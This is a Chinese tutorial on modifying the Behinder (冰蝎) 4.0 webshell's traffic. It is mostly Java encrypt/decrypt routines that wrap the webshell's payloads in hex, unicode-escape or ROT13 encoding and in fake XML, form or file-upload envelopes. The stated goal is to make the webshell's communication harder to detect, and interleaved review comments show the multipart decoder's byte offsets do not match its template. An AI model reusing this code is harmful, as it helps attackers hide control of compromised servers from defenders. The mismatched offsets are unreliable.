冰蝎4.0流量分析及魔改
字数 728 2025-08-25 22:58:56
冰蝎4.0流量分析及魔改技术详解
0x00 前言
冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便。本文以jsp脚本类型为例,详细讲解冰蝎4流量魔改的各种技术方法。
0x01 传输协议分析
冰蝎4内置了多种传输协议,传输协议可以理解为流量的加密方式。以default_xor传输协议为例,这种传输协议是对原始数据进行了异或加密。
原始流量分析
如果去掉加密解密函数的相关代码,可以看到:
- request body实际传输的是java字节码
- 响应体是固定格式的明文 JSON
0x02 冰蝎4.0魔改技术
变换加密方式
1. Hex加密
加密函数:
/**
 * Transport-side encoder (hex variant): Base64-encodes {@code data}, swaps the two
 * non-alphanumeric Base64 symbols ('+' -> '<', '/' -> '>'), then writes every
 * character of that text as its hex code, two digits per character.
 *
 * @param data raw bytes to encode
 * @return hex text as bytes, in the platform default charset (pre-JDK 18 that is
 *         not guaranteed to be UTF-8)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Non-standard Base64 alphabet: '<' and '>' stand in for '+' and '/'. The same fixed
// substitution appears in every variant on this page, so it is a stable artifact for detection.
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < result.length(); i++){
int ch = (int)result.charAt(i);
// toHexString() does not zero-pad, but every character here ('0'..'9', 'A'..'Z', 'a'..'z',
// '<', '=', '>') is >= 0x30, so each one still yields exactly two hex digits.
String s4 = Integer.toHexString(ch);
// Repeated concatenation is quadratic in the text length; harmless at these sizes.
str = str + s4;
}
return str.getBytes();
}
解密函数:
/**
 * Inverse of the hex Encrypt above: parses {@code data} as hex digit pairs, reverses
 * the '<'/'>' substitution and Base64-decodes the result.
 *
 * @param data hex text produced by Encrypt
 * @return decoded bytes
 * @throws Exception IllegalArgumentException from the Base64 decoder on text that was
 *         not produced by Encrypt; hex-parse failures are only printed (see below)
 */
private byte[] Decrypt(byte[] data) throws Exception {
// Platform default charset, matching Encrypt's getBytes().
String s = new String(data);
// Integer division: an odd trailing nibble is silently dropped.
byte[] baKeyword = new byte[s.length()/2];
for(int i = 0; i < baKeyword.length; i++){
try {
baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16));
} catch(Exception e){
// A non-hex pair is printed and skipped, leaving baKeyword[i] at its default 0;
// the resulting NUL is outside the Base64 alphabet, so the decode below would reject it.
e.printStackTrace();
}
}
try {
s = new String(baKeyword, "utf-8");
} catch(Exception e1){
// UnsupportedEncodingException cannot occur for "utf-8"; it would only be printed anyway.
e1.printStackTrace();
}
byte[] str = java.util.Base64.getDecoder().decode(s.replace("<", "+").replace(">", "/"));
return str;
}
2. Unicode加密
加密函数:
/**
 * Transport-side encoder (unicode-escape variant): Base64 with '+'/'/' swapped to
 * '<'/'>', then every character written as a Java-style escape "\u00XX".
 *
 * @param data raw bytes to encode
 * @return escape-sequence text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
// Unused local.
String str = "";
StringBuffer unicode = new StringBuffer();
for(int i = 0; i < result.length(); i++){
char c = result.charAt(i);
// The fixed "\u00" prefix is correct only because every input char is ASCII (< 0x100) and
// >= 0x30, so toHexString() always returns exactly two digits. Output is therefore six bytes
// per input character with a constant four-byte prefix on each.
unicode.append("\\u00" + Integer.toHexString(c));
}
return unicode.toString().getBytes();
}
解密函数:
/**
 * Inverse of the unicode-escape Encrypt above: scans for "\uXXXX" escapes, rebuilds
 * the text, undoes the '<'/'>' substitution and Base64-decodes it.
 *
 * @param data escape text produced by Encrypt
 * @return decoded bytes
 * @throws Exception NumberFormatException on a non-hex escape; IllegalArgumentException
 *         from the Base64 decoder on text that was not produced by Encrypt
 */
private byte[] Decrypt(byte[] data) throws Exception {
String unicode = new String(data);
StringBuilder sb = new StringBuilder();
int i = -1;
int pos = 0;
// Each iteration copies any literal text before the next "\u", then the decoded character.
while((i=unicode.indexOf("\\u", pos)) != -1) {
sb.append(unicode.substring(pos, i));
// Guard keeps substring(i+2, i+6) in range (it needs i+6 <= length).
if(i+5 < unicode.length()) {
pos = i+6;
sb.append((char)Integer.parseInt(unicode.substring(i+2, i+6), 16));
}
// NOTE(review): pos is only advanced inside the guard, so an escape with fewer than four
// characters after "\u" at the end of the input leaves pos unchanged and indexOf() keeps
// returning the same i. Literal text after the last escape is never copied either. Neither
// matters for Encrypt's output, which consists of complete escapes only.
}
byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<", "+").replace(">", "/"));
return str;
}
3. Rot13加密
加密函数:
/**
 * Transport-side encoder (ROT13 variant): Base64 with '+'/'/' swapped to '<'/'>',
 * then ROT13 applied to ASCII letters only.
 *
 * @param data raw bytes to encode
 * @return rotated text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
String input = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
// Rotate within 'A'..'Z', wrapping past 'Z'.
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
// Same rotation within 'a'..'z'.
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
// Digits, '<', '>' and the '=' padding fall through unchanged, so they stay visible on the wire.
str = str + ch;
}
return str.getBytes();
}
解密函数:
/**
 * Inverse of the ROT13 Encrypt above. ROT13 is its own inverse, so the rotation here
 * is identical to Encrypt's; afterwards the '<'/'>' substitution is undone and the
 * text is Base64-decoded.
 *
 * @param data rotated text produced by Encrypt
 * @return decoded bytes
 * @throws Exception IllegalArgumentException from the Base64 decoder on text that was
 *         not produced by Encrypt
 */
private byte[] Decrypt(byte[] data) throws Exception {
String input = new String(data);
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
// Rotate within 'A'..'Z', wrapping past 'Z'.
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
// Same rotation within 'a'..'z'.
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
// Non-letters pass through unchanged.
str = str + ch;
}
return java.util.Base64.getDecoder().decode(str.replace("<", "+").replace(">", "/"));
}
变换传输方式
1. XML格式传输
加密函数:
/**
 * Transport-side encoder (XML envelope): Base64 with '+'/'/' swapped to '<'/'>',
 * spliced into a fixed XML-looking template in place of the placeholder "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Everything except the payload is constant: prolog, <id>1</id> and the element names,
// so the same surrounding bytes appear in every request.
String xml = "<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>";
// The payload is not XML-escaped; any '<' or '>' introduced by the substitution makes the
// result ill-formed XML. Decrypt relies on fixed byte offsets rather than an XML parser.
xml = xml.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return xml.getBytes();
}
解密函数:
/**
 * Strips the fixed XML envelope by byte offset and Base64-decodes the payload.
 *
 * @param data envelope bytes produced by the XML Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 63 bytes (negative length); IllegalArgumentException from the Base64
 *         decoder when the bytes between the offsets are not the expected text
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// 46 = length of the template prefix up to and including "<content>"; 63 = that prefix plus
// the 17-byte suffix "</content></user>". Nothing verifies that those bytes actually hold the envelope.
bos.write(data, 46, data.length - 63);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
2. Key-Value格式传输
加密函数:
/**
 * Transport-side encoder (key=value envelope): Base64 with '+'/'/' swapped to '<'/'>',
 * spliced into a fixed form-style template in place of the placeholder "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Despite the local's name this is key=value text, not JSON. The id, token and status
// values are constants, so every request carries the identical surrounding bytes.
String json = "id=1&content=DaYer0&token=1452178369&status=00000";
// The payload is not URL-encoded; '<', '>' and '=' go in verbatim.
json = json.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return json.getBytes();
}
解密函数:
/**
 * Strips the fixed key=value envelope by byte offset and Base64-decodes the payload.
 *
 * @param data envelope bytes produced by the key=value Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 43 bytes (negative length); IllegalArgumentException from the Base64
 *         decoder when the bytes between the offsets are not the expected text
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// 13 = length of "id=1&content="; 43 = that prefix plus the 30-byte suffix
// "&token=1452178369&status=00000". No check that the bytes actually hold the envelope.
bos.write(data, 13, data.length - 43);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
3. Multipart格式传输
加密函数:
/**
 * Transport-side encoder (multipart-style envelope): Base64 with '+'/'/' swapped to
 * '<'/'>', spliced into a fixed multipart-looking template in place of "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Boundary, field name, filename and Content-Type are constants, and line endings are bare
// '\n', so the bytes around the payload are identical in every request.
String upload = "-7e6103b1815de\nContent-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\"\nContent-Type:application/octet-stream\n\nDaYer0\n--7e6103b1815de--";
upload = upload.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return upload.getBytes();
}
解密函数:
/**
 * Strips the fixed multipart-style envelope by byte offset and Base64-decodes the payload.
 *
 * @param data envelope bytes produced by the multipart Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 195 bytes (negative length); IllegalArgumentException from the Base64
 *         decoder when the bytes between the offsets are not the expected text
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// Offsets are meant to be the template prefix length and prefix+suffix length.
// NOTE(review): the template string shown in Encrypt above counts to a 122-byte prefix and an
// 18-byte suffix (140 total), not 150/195; presumably the boundary string was longer in the
// original source and was shortened when this page was rendered — confirm before trusting either.
bos.write(data, 150, data.length - 195);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
加密方式+传输方式组合
1. XML格式+Rot13加密
加密函数:
/**
 * Combined encoder (XML envelope + ROT13): Base64 with '+'/'/' swapped to '<'/'>',
 * ROT13 on ASCII letters, then spliced into the fixed XML template in place of "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Constant envelope; only the <content> text varies between requests.
String xml = "<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>";
String input = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
// Rotate within 'A'..'Z', wrapping past 'Z'.
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
// Same rotation within 'a'..'z'.
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
// Digits, '<', '>' and '=' padding pass through unchanged.
str = str + ch;
}
// Not XML-escaped: a '<' or '>' in the payload makes the result ill-formed XML.
xml = xml.replace("DaYer0", str);
return xml.getBytes();
}
解密函数:
/**
 * Inverse of the XML + ROT13 Encrypt: strips the envelope by byte offset, applies
 * ROT13 again (it is its own inverse), undoes the '<'/'>' substitution and Base64-decodes.
 *
 * @param data envelope bytes produced by the matching Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 63 bytes; IllegalArgumentException from the Base64 decoder when the bytes
 *         between the offsets are not the expected text
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// 46 = prefix through "<content>", 63 = prefix plus the 17-byte "</content></user>" suffix.
bos.write(data, 46, data.length - 63);
String input = new String(bos.toByteArray());
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
// Rotate within 'A'..'Z', wrapping past 'Z'.
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
// Same rotation within 'a'..'z'.
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
// Non-letters pass through unchanged.
str = str + ch;
}
return java.util.Base64.getDecoder().decode(str.replace("<", "+").replace(">", "/"));
}
2. Key-Value格式+Unicode加密
加密函数:
/**
 * Combined encoder (key=value envelope + unicode escapes): Base64 with '+'/'/' swapped
 * to '<'/'>', each character written as "\u00XX", then spliced into the fixed
 * form-style template in place of "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// id, token and status are constants, so the surrounding bytes are identical in every request.
String content = "id=1&content=DaYer0&token=1452178369&status=00000";
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
// Unused local.
String str = "";
StringBuffer unicode = new StringBuffer();
for(int i = 0; i < result.length(); i++){
char c = result.charAt(i);
// "\u00" prefix is valid only because every input char is ASCII and >= 0x30, giving exactly
// two hex digits; the output is six bytes per character with a constant four-byte prefix.
unicode.append("\\u00" + Integer.toHexString(c));
}
// The backslashes are not URL-encoded; they go into the key=value text verbatim.
content = content.replace("DaYer0", unicode.toString());
return content.getBytes();
}
解密函数:
/**
 * Inverse of the key=value + unicode Encrypt: strips the envelope by byte offset,
 * decodes the "\uXXXX" escapes, undoes the '<'/'>' substitution and Base64-decodes.
 *
 * @param data envelope bytes produced by the matching Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 43 bytes; NumberFormatException on a non-hex escape; IllegalArgumentException
 *         from the Base64 decoder when the rebuilt text is not Base64
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// 13 = length of "id=1&content="; 43 = that plus the 30-byte "&token=1452178369&status=00000" suffix.
bos.write(data, 13, data.length - 43);
String unicode = new String(bos.toByteArray());
StringBuilder sb = new StringBuilder();
int i = -1;
int pos = 0;
// Each iteration copies any literal text before the next "\u", then the decoded character.
while((i=unicode.indexOf("\\u", pos)) != -1) {
sb.append(unicode.substring(pos, i));
// Guard keeps substring(i+2, i+6) in range (it needs i+6 <= length).
if(i+5 < unicode.length()) {
pos = i+6;
sb.append((char)Integer.parseInt(unicode.substring(i+2, i+6), 16));
}
// NOTE(review): pos is only advanced inside the guard, so a truncated trailing escape leaves
// pos unchanged and indexOf() keeps returning the same i. Literal text after the last escape
// is never copied either. Neither matters for Encrypt's output, which is complete escapes only.
}
byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<", "+").replace(">", "/"));
return str;
}
3. Multipart格式+Hex加密
加密函数:
/**
 * Combined encoder (multipart-style envelope + hex): Base64 with '+'/'/' swapped to
 * '<'/'>', each character written as two hex digits, then spliced into the fixed
 * multipart-looking template in place of "DaYer0".
 *
 * @param data raw bytes to encode
 * @return envelope text as bytes (platform default charset)
 * @throws Exception declared only; nothing in the body throws a checked exception
 */
private byte[] Encrypt(byte[] data) throws Exception {
// Boundary, field name, filename and Content-Type are constants with bare '\n' line endings,
// so the bytes around the payload are identical in every request.
String upload = "-7e6103b1815de\nContent-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\"\nContent-Type:application/octet-stream\n\nDaYer0\n--7e6103b1815de--";
String str = "";
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
for(int i = 0; i < result.length(); i++){
int ch = (int)result.charAt(i);
// toHexString() does not zero-pad; every character here is >= 0x30, so it is always two digits.
String s4 = Integer.toHexString(ch);
// Quadratic concatenation; harmless at these sizes.
str = str + s4;
}
upload = upload.replace("DaYer0", str);
return upload.getBytes();
}
解密函数:
/**
 * Inverse of the multipart + hex Encrypt: strips the envelope by byte offset, parses the
 * hex digit pairs, undoes the '<'/'>' substitution and Base64-decodes.
 *
 * @param data envelope bytes produced by the matching Encrypt
 * @return decoded bytes
 * @throws Exception IndexOutOfBoundsException from write() when {@code data} is shorter
 *         than 195 bytes; IllegalArgumentException from the Base64 decoder when the rebuilt
 *         text is not Base64; hex-parse failures are only printed (see below)
 */
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
// NOTE(review): the template shown in the matching Encrypt counts to a 122-byte prefix and an
// 18-byte suffix (140 total), not 150/195; presumably the boundary string was longer in the
// original source and was shortened when this page was rendered — confirm before trusting either.
bos.write(data, 150, data.length - 195);
String s = new String(bos.toByteArray());
// Integer division: an odd trailing nibble is silently dropped.
byte[] baKeyword = new byte[s.length()/2];
for(int i = 0; i < baKeyword.length; i++){
try {
baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16));
} catch(Exception e){
// A non-hex pair is printed and skipped, leaving baKeyword[i] at its default 0;
// the resulting NUL is outside the Base64 alphabet, so the decode below would reject it.
e.printStackTrace();
}
}
try {
s = new String(baKeyword, "utf-8");
} catch(Exception e1){
// UnsupportedEncodingException cannot occur for "utf-8"; it would only be printed anyway.
e1.printStackTrace();
}
return java.util.Base64.getDecoder().decode(s.replace("<", "+").replace(">", "/"));
}
0x03 总结
本文详细介绍了冰蝎4流量魔改的多种方法,包括:
- 单独变换加密方式(Hex、Unicode、Rot13)
- 单独变换传输格式(XML、Key-Value、Multipart)
- 加密方式与传输格式的组合使用
通过这些方法可以有效混淆冰蝎的通信流量,使其更难以被检测。读者可以根据实际需求选择合适的魔改方式,或进一步开发新的魔改思路。